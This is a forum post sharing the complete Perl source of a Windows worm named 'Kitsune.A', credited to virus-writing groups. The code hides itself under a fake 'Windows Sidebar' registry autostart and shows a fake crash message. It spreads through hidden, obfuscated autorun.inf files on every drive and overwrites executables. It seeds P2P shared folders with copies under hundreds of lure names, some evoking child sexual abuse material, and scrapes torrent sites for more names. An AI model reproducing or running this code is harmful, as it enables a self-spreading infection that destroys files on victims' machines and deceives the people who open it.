[+]Topic: Code
[+]Von: Rayden
[+]Return: Code

* USB-Verbreitung
* P2P-Verbreitung (Dateinamen: Bereits vorhandene, Eigene Liste, Installierte Programme, Torrentsites)

######################## # Perl Win32 Kitsune.A # # (c) by Rayden # ######################## # http://vxnetw0rk.ws # # http://bi0tic.info # ######################## # # Thx to: # - Perforin (Für seinen "Datum und Zeit" Code, seine Sourcecodes und Tutorials) # - ShaQ (Für seine Sourcecodes und Tutorials) # # Greetz to: # - All VXnetw0rk Members # - All bi0tic Members # #################################################################################################################################################### # Funktionen # #################################################################################################################################################### # USB-Verbreitung # P2P-Verbreitung (Dateinamen: Bereits vorhandene, Eigene Liste, Installierte Programme, Torrentsites) #################################################################################################################################################### # Kitsune.A Sourcecode # #################################################################################################################################################### use File::Basename; use File::Copy; use File::Find; use File::Path; use IO::Socket; use LWP::Simple; use threads; use Win32; use Win32::DriveInfo; use Win32::File; use Win32::Mutex; use Win32::Process; use Win32::Registry; $mutex = "..::<~Kitsune.A~>::.."; $appdata = $ENV{"appdata"}; $systemroot = $ENV{"systemroot"}; $username = $ENV{"username"}; $userprofile = $ENV{"userprofile"}; $pfad = "$appdata\\Microsoft\\Windows Sidebar"; $file = "sidebar.exe"; $para = "/autoRun"; $regpfad = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; $regname = "Windows Sidebar"; $usbpara = "/install"; $usbfile = "install.exe"; $usbfile2 = "naked.exe"; if (($ARGV[0]) eq ($usbpara)) { $laufwerk = dirname($0); Win32::Process::Create( $plaufwerk, "$systemroot\\explorer.exe", "$systemroot\\explorer.exe $laufwerk", "0", "DETACHED_PROCESS", "."); Win32::Mutex::open($mutexobj, $mutex) && exit; } mkpath ("$pfad"); chdir ("$pfad"); Win32::File::SetAttributes("$0", NORMAL); copy ("$0", "$pfad\\$file"); $HKEY_CURRENT_USER->Create($regpfad,$key); $key->SetValueEx("$regname",$reserviert,REG_SZ,"\"$pfad\\$file\" $para"); $key->Close(); if (($ARGV[0]) eq ($usbpara)) { Win32::Process::Create($pinstall, "$file", "\"$pfad\\$file\" $para", "0", "DETACHED_PROCESS", "."); Win32::File::SetAttributes("$drives\\$usbfile", READONLY | HIDDEN | SYSTEM); exit; } if (($ARGV[0]) ne ($para)) { Win32::Process::Create($pinstall, "$file", "\"$pfad\\$file\" $para", "0", "DETACHED_PROCESS", "."); if ($0 =~ m/.*\\(.*)\..*$/) { $errorfile = "$1"; } else { $errorfile = "Error"; } Win32::MsgBox("The application was unable to start correctly (0xc0000005). Click OK to close the application",16,"$errorfile - Application Error"); exit; } Win32::Mutex::open($mutexobj, $mutex) && exit; Win32::Mutex::Create($mutexobj, 0, $mutex); $usbthread = threads->create(\&usbthread); peerthread(); sub usbthread { @autorunarray = ( "[", "AutoRun", "]", "+++", "open", "=", "$usbfile $usbpara", "+++", "shellexecute", "=", "$usbfile $usbpara", "+++", "shell\\open\\Command", "=", "$usbfile $usbpara", "+EOF+", "action", "=", "Open folder to view files", "---", "icon", "=", "%systemroot%\\system32\\shell32.dll,4", "---", "use Autoplay", "=", "1", "-EOF-"); @kontrollzeichen = ("", "", "", "", "", "", "", "", " ", " ", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", "", ""); foreach $autorunstring (@autorunarray) { if ($autorunstring eq "+++") { $nummmax = int(rand(50)+1); for(1..$nummmax) { $kontrollzeichennr = $#kontrollzeichen + 1; $kontrollzeichennr = int(rand($kontrollzeichennr)); $autorunhddstring.= $kontrollzeichen[$kontrollzeichennr]; } push (@autorunhdd,"$autorunhddstring"); undef $autorunhddstring; next; } elsif ($autorunstring eq "+EOF+") { $nummmax = int(rand(50)+1); for(1..$nummmax) { $kontrollzeichennr = $#kontrollzeichen + 1; $kontrollzeichennr = int(rand($kontrollzeichennr)); $autorunhddstring.= $kontrollzeichen[$kontrollzeichennr]; } push (@autorunhdd,"$autorunhddstring"); undef $autorunhddstring; last; } $nummmax = int(rand(50)+1); for(1..$nummmax) { $kontrollzeichennr = $#kontrollzeichen + 1; $kontrollzeichennr = int(rand($kontrollzeichennr)); $autorunhddstring.= $kontrollzeichen[$kontrollzeichennr]; } $autorunhddstring.= $autorunstring; } foreach $autorunstring (@autorunarray) { if ($autorunstring =~ m/(\+\+\+|\-\-\-|\+EOF\+)/) { $nummmax = int(rand(50)+1); for(1..$nummmax) { $kontrollzeichennr = $#kontrollzeichen + 1; $kontrollzeichennr = int(rand($kontrollzeichennr)); $autorunusbstring.= $kontrollzeichen[$kontrollzeichennr]; } push (@autorunusb,"$autorunusbstring"); undef $autorunusbstring; next; } elsif ($autorunstring eq "-EOF-") { $nummmax = int(rand(50)+1); for(1..$nummmax) { $kontrollzeichennr = $#kontrollzeichen + 1; $kontrollzeichennr = int(rand($kontrollzeichennr)); $autorunusbstring.= $kontrollzeichen[$kontrollzeichennr]; } push (@autorunusb,"$autorunusbstring"); undef $autorunusbstring; last; } $nummmax = int(rand(50)+1); for(1..$nummmax) { $kontrollzeichennr = $#kontrollzeichen + 1; $kontrollzeichennr = int(rand($kontrollzeichennr)); $autorunusbstring.= $kontrollzeichen[$kontrollzeichennr]; } $autorunusbstring.= $autorunstring; } @drives = ("C:", "D:", "E:", "F:", "G:", "H:", "I:", "J:", "K:", "L:", "M:", "N:", "O:", "P:", "Q:", "R:", "S:", "T:", "U:", "V:", "W:", "X:", "Y:", "Z:"); while (1) { foreach $drives (@drives) { Win32::File::SetAttributes("$drives\\$usbfile2", NORMAL); copy ("$0", "$drives\\$usbfile2"); Win32::File::SetAttributes("$drives\\$usbfile", NORMAL); copy ("$0", "$drives\\$usbfile"); Win32::File::SetAttributes("$drives\\$usbfile", READONLY | HIDDEN | SYSTEM); $drivetype = Win32::DriveInfo::DriveType("$drives\\"); if ($drivetype == 2) { Win32::File::SetAttributes("$drives\\autorun.inf", NORMAL); open (AUTORUNUSB,">","$drives\\autorun.inf"); foreach $autorunusb (@autorunusb) { print AUTORUNUSB "$autorunusb\r\n"; } close (AUTORUNUSB); Win32::File::SetAttributes("$drives\\autorun.inf", READONLY | HIDDEN | SYSTEM); } else { Win32::File::SetAttributes("$drives\\autorun.inf", NORMAL); open (AUTORUNHDD,">","$drives\\autorun.inf"); foreach $autorunhdd (@autorunhdd) { print AUTORUNHDD "$autorunhdd\r\n"; } close (AUTORUNHDD); Win32::File::SetAttributes("$drives\\autorun.inf", READONLY | HIDDEN | SYSTEM); } } sleep (30); } } sub peerthread { while (1) { @peerfolder = ( "applejuice\\incoming", "ares\\my shared folder", "bearshare\\shared", "blubster\\my shared folder", "direct connect\\received files", "my dropbox", "edonkey2000\\incoming", "emule\\incoming", "filetopia3\\files", "frostwire\\saved", "frostwire\\shared", "gnucleus\\downloads", "grokster\\my shared folder", "grokster\\my grokster", "icq\\shared files", "icq\\shared folder", "imesh\\my shared folder", "kazaa\\my shared folder", "kazaa lite\\my shared folder", "kazaa lite k++\\my shared folder", "kmd\\my shared folder", "limewire\\saved", "limewire\\shared", "morpheus\\my shared folder", "overnet\\incoming", "rapigator\\share", "shareaza\\downloads", "swaptor\\download", "tesla\\files", "torrentopia\downloads", "warez p2p client\\my shared folder", "winmx\\my shared folder", "winmx\\shared", "xolox\\downloads"); $peerfolder = join ('|', @peerfolder); $peerfolder =~ s/\\/\\\\\\\\/g; ############################## # Datum und Zeit by Perforin # ############################## ($sekunde, $minute, $stunde, $tag, $monat, $jahroffset, $dayOfWeek, $dayOfYear, $daylightSavings) = localtime(); $jahr = 1900 + $jahroffset; $monat = $monat + 1; if ($monat <= 9) { $monat = "0$monat"; } if ($monat >= 05) { $jahr = $jahr + 1; } @peerfile = ( "3D Gamestudio.exe", "Accounts.exe", "Acronis Backup & Recovery 10 Advanced Workstation.exe", "Acronis True Image $jahr.exe", "Adobe Activator Crack Keygen Photoshop.exe", "Adobe After Effects CS5.exe", "Adobe Creative Suite 5 Master Collection.exe", "Adobe Photoshop CS5 Brushes.exe", "Adobe Photoshop CS5 Extended.exe", "Adobe Photoshop CS5 Language Pack.exe", "Adobe Photoshop Elements 8.exe", "Adobe Photoshop Keygen.exe", "All Formats Converter.exe", "All Instant Messenger Hacker.exe", "All Instant Messenger Password Stealer.exe", "Allround Cheat Engine.exe", "Allround Password Hacker.exe", "Allround Password Stealer.exe", "Allround SIM-Lock Removal.exe", "All to iPhone Converter.exe", "Amateur Porn Collection.exe", "American Express Card Generator.exe", "Anal Fisting.exe", "Anal porn Collection.exe", "Anal teen hardcore xxx porn hot ass fuck licking oral blowjob cumshot creampie fisting gangbang sex.exe", "Anal xxx porno arsch fick oral blasen titten geil sex.exe", "Android Market Free Downloader.exe", "Anonym Email.exe", "Anonym IP.exe", "Anonym SMS.exe", "Anonymizer.exe", "Any CD.exe", "Any DVD.exe", "Any DVD-HD.exe", "Any BluRay.exe", "Apple Appstore Free Downloader.exe", "Apple iPad iPhone iPod iTunes Appstore Free Downloader.exe", "Audio Codec Pack.exe", "Avira Antivir Premium $jahr.exe", "Avira Antivir Security Suite $jahr.exe", "Battlefield Bad Company 2 Vietnam.exe", "Big Wordlist.exe", "Bioshock 2.exe", "BlackBerry App World Free Downloader.exe", "Bloodmod Collection.exe", "Bloodpatch Collection.exe", "Bluetooth Hacker.exe", "Bluray Disc Ripper.exe", "Bot Generator.exe", "Brutus Password Cracker.exe", "Call of Duty Black Ops.exe", "Call2Pay Generator.exe", "Camtasia Studio 7.exe", "CAS Decoder.exe", "Chat Hacker.exe", "Cheat Engine.exe", "Cirrus Card Generator.exe", "Clone CD.exe", "Clone DVD mobile.exe", "Clone DVD.exe", "Clone BluRay.exe", "Command & Conquer 4 Tiberian Twilight.exe", "Conficker Downadup Kido Sourcecode.exe", "Copy Protection Removal.exe", "Counter Strike 1.6.exe", "Counter Strike Aimbot.exe", "Counter Strike Cheat Engine.exe", "Counter Strike Map Pack.exe", "Counter Strike Source.exe", "Counter Strike Wallhack.exe", "Counter Strike Bloodmod.exe", "Counter Strike Bloodpatch.exe", "Craagle $jahr Serial Crack Cover Finder.exe", "Cracks Archive.exe", "Cracks Collection.exe", "Credit Card Generator.exe", "Crysis 2.exe", "Cumshot Collection.exe", "Cyberlink Power DVD.exe", "Daemon Tools Pro.exe", "Debit Card Generator.exe", "Diners Club Card Generator.exe", "Download Accelerator.exe", "DRM Removal.exe", "DVD Ripper.exe", "e-book Downloader.exe", "Elite Keylogger.exe", "Email Account Hacker.exe", "Eurocard Generator.exe", "Exploit Collection.exe", "Facebook Accounts.exe", "Facebook Game Cheat Engine.exe", "Facebook Hacker.exe", "Facebook Member Killer.exe", "Facebook Password Stealer.exe", "Facebook Private Profile Viewer.exe", "Facebook Spy.exe", "Fake Webcam.exe", "Fake Email.exe", "Fifa 12.exe", "Fifa Manager $jahr.exe", "Final Fantasy 15 XV.exe", "FTP Hacker.exe", "Game Jackal Enterprise.exe ", "Game Jackal Pro .exe", "Gamemaker.exe", "Gangbang Collection.exe", "Google Android Market Free Downloader.exe", "Google Earth Plus.exe", "Google Earth Pro.exe", "Google Search Engine Optimizer SEO.exe", "Gothic 5.exe", "GPS Spy.exe", "Grand Theft Auto 4 GTA IV.exe", "Grand Theft Auto GTA Add-ons collection.exe", "Grand Theft Auto GTA San Andreas.exe", "Grand Theft Auto GTA Vice City.exe", "Hack the Web.exe", "Hackers Black Book.exe", "Hackertools Collection.exe", "Half Life 2 Episode Three.exe", "Hardcore Porn Collection.exe", "Harry Potter e book all languages.exe", "Harry Potter Game.exe", "Harry Potter.exe", "Hash Cracker.exe", "HDCP Removal.exe", "Hentai Porn Collection.exe", "Homepage Hacker.exe", "Hotmail Hacker.exe", "ICQ Hacker.exe", "ICQ Password Cracker.exe", "Invisible IP.exe", "iPad Jailbreak.exe", "iPhone Apps Collection.exe", "iPhone iTunes Apps Free Downloader.exe", "iPhone Jailbreak.exe", "iPhone Unlocker.exe", "iPhone Hacker.exe", "iPod Touch Jailbreak.exe", "IRC Hacker.exe", "iTunes Free Downloader.exe", "Jailbait Porn Collection.exe", "Kamasutra Collection.exe", "Kaspersky Antivirus $jahr.exe", "Kaspersky Internet Security $jahr.exe", "Kaspersky Keygen.exe", "Keygen Collection.exe", "Keygen for all Microsoft Windows Products.exe", "Kitsune Removal.exe", "Kitsune Sourcecode.exe", "K-Lite Mega Codec Pack.exe", "LAN Hacker.exe", "Left 4 Dead 2.exe", "Lesbian Porn Collection.exe", "Lolita Porn Collection.exe", "Maestro Card Generator.exe", "Massmailer.exe", "Master Card Generator.exe", "Matrix Screensaver.scr", "Matrix.exe", "Microsoft Office Academic Professional 2010.exe", "Microsoft Office Home and Business 2010.exe", "Microsoft Office Home and Student 2010.exe", "Microsoft Office Password Recovery.exe", "Microsoft Office Professional 2010.exe", "Microsoft Office Professional Plus 2010.exe", "Microsoft Office Standard 2010.exe", "Microsoft Office Starter 2010.exe", "Microsoft Office Word, Excel, Powerpoint, Outlook, One Note.exe", "Microsoft Windows 7 Activator.exe", "Microsoft Windows 7 Enterprise x86 32bit.exe", "Microsoft Windows 7 Enterprise x64 64bit.exe", "Microsoft Windows 7 Home Basic x86 32bit.exe", "Microsoft Windows 7 Home Basic x64 64bit.exe", "Microsoft Windows 7 Home Premium x86 32bit.exe", "Microsoft Windows 7 Home Premium x64 64bit.exe", "Microsoft Windows 7 Keygen.exe", "Microsoft Windows 7 Professional x86 32bit.exe", "Microsoft Windows 7 Professional x64 64bit.exe", "Microsoft Windows 7 Serials.exe", "Microsoft Windows 7 Service Pack 1.exe", "Microsoft Windows 7 Service Pack 2.exe", "Microsoft Windows 7 Sourcecode.exe", "Microsoft Windows 7 Starter x86 32bit.exe", "Microsoft Windows 7 Starter x64 64bit.exe", "Microsoft Windows 7 Ultimate x86 32bit.exe", "Microsoft Windows 7 Ultimate x64 64bit.exe", "Microsoft Windows 8 Home x86 32bit.exe", "Microsoft Windows 8 Home x64 64bit.exe", "Microsoft Windows 8 Home x128 128bit.exe", "Microsoft Windows 8 Mystic Orient.exe", "Microsoft Windows 8 .NET.exe", "Microsoft Windows 8 Professional x86 32bit.exe", "Microsoft Windows 8 Professional x64 64bit.exe", "Microsoft Windows 8 Professional x128 128bit.exe", "Microsoft Windows 8 Sourcecode.exe", "Microsoft Windows Home Server V2 Vail.exe", "Microsoft Windows Media Center Edition.exe", "Microsoft Windows Next.exe", "Microsoft Windows Serials.exe", "Microsoft Windows Server 2003.exe", "Microsoft Windows Server 2008.exe", "Microsoft Windows Update Pack.exe", "Microsoft Visual Studio $jahr Express Edition.exe", "Microsoft Visual Studio $jahr Standard Edition.exe", "Microsoft Visual Studio $jahr Professional Edition.exe", "Microsoft Visual Studio $jahr Team System Edition.exe", "Microsoft Windows XP Professional x64 64bit.exe", "Microsoft Windows XP Home.exe", "Microsoft Windows XP Professional.exe", "Microsoft Windows XP Sourcecode.exe", "Mobile Phone Hacker.exe", "MSN Hacker.exe", "MP3 Free Downloader.exe", "Multiplayer Cheat Engine.exe", "Music Maker $jahr XXL.exe", "Need for Speed Hot Pursuit.exe", "Need for Speed Shift 2 Unleashed.exe", "Nero Multimedia Suite 10 Platinum HD.exe", "Nokia OVI Store Free Downloader.exe", "One Click Hoster Premium Account Generator.exe", "Partition Magic $jahr.exe", "Passport Generator.exe", "Passwords.exe", "Paypal Faker.exe", "Paypal Hacker.exe", "Paysafecard Generator.exe", "Pay TV Decoder.exe", "PDF Creator Converter Manipulator.exe", "Perfect Privacy.exe", "Phishing Site Generator.exe", "Pinnacle Studio Version 15.exe", "Porno Screensaver.scr", "Porno sex oral anal cool awesome!!.exe", "Postal 3 III.exe", "Postal Fudge Pack.exe", "Prepaid Generator.exe", "Pro Evolution Soccer $jahr.exe", "Rapidshare Premium Account Generator.exe", "Real Credit Card Generator.exe", "RPG Maker VX.exe", "RPG Maker.exe", "S.T.A.L.K.E.R. Call of Pripyat 2.exe", "Sado Maso SM Porn Collection.exe", "Samsung Apps Free Downloader.exe", "Schoolgirl Porn Collection.exe", "Serials Archive.exe", "Serials Collection.exe", "sex sex sex sex sex sex.exe", "Share.cx Premium Account Generator.exe", "Skype Hacker.exe", "Softcam Keygen.exe", "Sony Ericsson Play Now Free Downloader.exe", "Sony Vegas Movie Studio HD Platinum 10 Production Suite.exe", "Sony Vegas Pro 10.exe", "Steam Accounts.exe", "Steam Account Generator.exe", "Steam Account Hacker.exe", "Steam Password Hacker.exe", "Stuxnet Sourcecode.exe", "Symantec Norton Antivirus $jahr.exe", "Symantec Norton Ghost 15.exe", "Teamspeak Hack.exe", "Teamspeak Spam.exe", "Teamspeak Voice Changer Morpher.exe", "Teen Porn Collection.exe", "The Sims 3.exe", "Torrent Premium Downloader.exe", "Traveller Cheque Generator.exe", "Trojan Generator.exe", "Tune Up Utilities $jahr.exe", "Twitter Hacker.exe", "Ubisoft Server Emulator.exe", "Ulead GIF Animator.exe", "Ultimate Audio & Video Format Converter.exe", "Ultimate Cheat Engine.exe", "Unreal Engine 4.exe", "Unreal Tournament 3.exe", "Uploaded.to Premium Account Generator.exe", "Usenext Account Generator.exe", "Usenext Hacker.exe", "Video Codec Pack.exe", "Virtual CloneDrive.exe", "Virtual DJ Pro 7.exe", "Virtual PC $jahr.exe", "Virus Generator.exe", "Visa Card Generator.exe", "VMware Player.exe", "VMWare Server.exe", "VMWare Workstation.exe", "VMware Workstation Keygen.exe", "VOIP Hacker.exe", "Warcraft 3.exe", "Warcraft 3 Cheat Engine.exe", "Warez Archive.exe", "Webcam Hacker.exe", "Webcam Spy.exe", "Webmoney Faker.exe", "Webmoney Hacker.exe", "Website Hacker.exe", "Winamp Pro.exe", "Windows Activator.exe", "Windows Genuine Removal Tool.exe", "Windows Market Free Downloader.exe", "Windows Messenger Hacker.exe", "Windows Rootkit.exe", "Winrar Password Recovery.exe", "Wireshark.exe", "WLAN Hacker.exe", "World of Warcraft.exe", "World of Warcraft Bot.exe", "World of Warcraft Cataclysm.exe", "World of Warcraft Cheat Engine.exe", "Worm Generator.exe", "www Hack.exe", "XXX Hardcore Images Collection.exe", "Youtube Free Downloader.exe"); $HKEY_LOCAL_MACHINE->Open("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall",$registry); $registry->GetKeys(\@programmhash); $registry->Close(); foreach (@programmhash) { $HKEY_LOCAL_MACHINE->Open("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"."$_",$registry); $registry->GetValues(\%programme); push(@programm,"$programme{DisplayName}[2]"); $registry->Close(); } @peerdrives = ("C:", "D:", "E:", "F:", "G:", "H:", "I:", "J:", "K:", "L:", "M:", "N:", "O:", "P:", "Q:", "R:", "S:", "T:", "U:", "V:", "W:", "X:", "Y:", "Z:"); foreach $peerdrives (@peerdrives) { chdir ("$peerdrives\\"); find(\&peerspreadsub,$peerdrives); } sub peerspreadsub { $File::Find::name =~ s/\//\\\\/g; if (-d $File::Find::name && $File::Find::name =~ m/($peerfolder)/ig) { push (@peerfolderexist,$File::Find::name); opendir (ORDNER,"$File::Find::name"); @dateien = readdir(ORDNER); close (ORDNER); foreach $dateien (@dateien) { if (-f "$File::Find::name\\$dateien" && "$File::Find::name\\$dateien" =~ m/(\.exe|\.scr|\.com|\.pif|\.bat|\.cmd)$/i) { copy ("$0", "$File::Find::name\\$dateien"); select(undef, undef, undef, 0.001); } elsif (-f "$File::Find::name\\$dateien") { if ($dateien =~ m/(.*)\..*$/) { copy ("$0", "$File::Find::name\\$1.exe"); select(undef, undef, undef, 0.001); } else { copy ("$0", "$File::Find::name\\$dateien.exe"); select(undef, undef, undef, 0.001); } } } foreach $peerfile (@peerfile) { copy ("$0", "$File::Find::name\\$peerfile"); select(undef, undef, undef, 0.001); } foreach $programm (@programm) { if (! "$programm" eq "") { copy ("$0", "$File::Find::name\\$programm.exe"); select(undef, undef, undef, 0.001); } } } } @torrents = ( "alivetorrents.com:/today:<a href=.*>(.*)<\/a>", "demonoid.com:/:<a href=.*>(.*)<\/a>", "mininova.org:/:<a href=.*>(.*)<\/a>", "thepiratebay.org:/recent:<div class=\"detName\"><a href=\".*\" class=\"detLink\" title=\".*\">(.*)<\/a><\/div>", "torrentreactor.net:/index.php?action=today:</a><a href=\".*\">(.*)<\/a>", "torrentz.com:/:<a href=.*>(.*)<\/a>"); torrentwahl : while (1) { $peerhttpsock = new IO::Socket::INET ( PeerAddr => "google.com", PeerPort => "80", Proto => "tcp"); if (not defined ($peerhttpsock)) { sleep (1); } else { print $peerhttpsock "GET / HTTP/1.1\r\n"; print $peerhttpsock "Host: google.com\r\n"; print $peerhttpsock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13\r\n"; print $peerhttpsock "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; print $peerhttpsock "Connection: close\r\n"; print $peerhttpsock "\r\n\r\n"; close ($peerhttpsock); foreach $torrents (@torrents) { if ($torrents =~ m/(.*?):(.*?):(.*)/) { $httphost = "$1"; $httpget = "$2"; $httpregex = "$3"; $peerhttpsock2 = new IO::Socket::INET ( PeerAddr => "$httphost", PeerPort => "80", Proto => "tcp"); if (not defined ($peerhttpsock2)) { next; } else { print $peerhttpsock2 "GET $httpget HTTP/1.1\r\n"; print $peerhttpsock2 "Host: $httphost\r\n"; print $peerhttpsock2 "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13\r\n"; print $peerhttpsock2 "Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; print $peerhttpsock2 "Connection: close\r\n"; print $peerhttpsock2 "\r\n\r\n"; while ($httpinput = <$peerhttpsock2>) { foreach ($httpinput =~ m/$httpregex/g) { push(@torrentname,"$_"); } } close ($peerhttpsock2); last torrentwahl; } } } } } %torrenthash; $torrenthash{$_} = 1 foreach (@torrentname); @unsortedtorrent = keys(%torrenthash); @torrentname = sort(@unsortedtorrent); undef %torrenthash; undef @unsortedtorrent; foreach $peerfolderexist (@peerfolderexist) { foreach $torrentname (@torrentname) { if (! "$torrentname" eq "") { $torrentname =~ s/[\\|\/|:|\*|\?|"|<|>|\|]/ /g; copy ("$0", "$peerfolderexist\\$torrentname.exe"); select(undef, undef, undef, 0.001); } } } undef @peerfolderexist; undef @torrentname; sleep (84600); } }